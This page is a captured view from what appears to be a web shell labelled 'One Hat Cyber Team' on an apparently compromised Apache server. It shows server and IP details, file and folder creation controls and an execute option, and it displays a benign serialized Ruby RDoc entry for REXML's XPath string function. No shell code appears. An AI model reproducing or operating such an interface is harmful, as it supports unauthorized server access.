⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
2.7.0
/
system
/
REXML
/
Functions
/
View File Name :
string-c.ri
U:RDoc::AnyMethod[iI"string:ETI"REXML::Functions::string;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"NA node-set is converted to a string by returning the string-value of the ;TI"Nnode in the node-set that is first in document order. If the node-set is ;TI"(empty, an empty string is returned.;To:RDoc::Markup::BlankLine o; ; [I"1A number is converted to a string as follows;T@o; ; [I"'NaN is converted to the string NaN;T@o; ; [I"/positive zero is converted to the string 0;T@o; ; [I"/negative zero is converted to the string 0;T@o; ; [I":positive infinity is converted to the string Infinity;T@o; ; [I";negative infinity is converted to the string -Infinity;T@o; ; [I"Lif the number is an integer, the number is represented in decimal form ;TI"Kas a Number with no decimal point and no leading zeros, preceded by a ;TI"-minus sign (-) if the number is negative;T@o; ; [I"Fotherwise, the number is represented in decimal form as a Number ;TI"Jincluding a decimal point with at least one digit before the decimal ;TI"Ipoint and at least one digit after the decimal point, preceded by a ;TI"Nminus sign (-) if the number is negative; there must be no leading zeros ;TI"Ibefore the decimal point apart possibly from the one required digit ;TI"Iimmediately before the decimal point; beyond the one required digit ;TI"Kafter the decimal point there must be as many, but only as many, more ;TI"Ldigits as are needed to uniquely distinguish the number from all other ;TI"IEEE 754 numeric values.;T@o; ; [I"KThe boolean false value is converted to the string false. The boolean ;TI"0true value is converted to the string true.;T@o; ; [I"KAn object of a type other than the four basic types is converted to a ;TI"4string in a way that is dependent on that type.;T: @fileI"lib/rexml/functions.rb;T:0@omit_headings_from_table_of_contents_below000[ I" ( object=@@context[:node] );T@;FI"Functions;TcRDoc::NormalModule00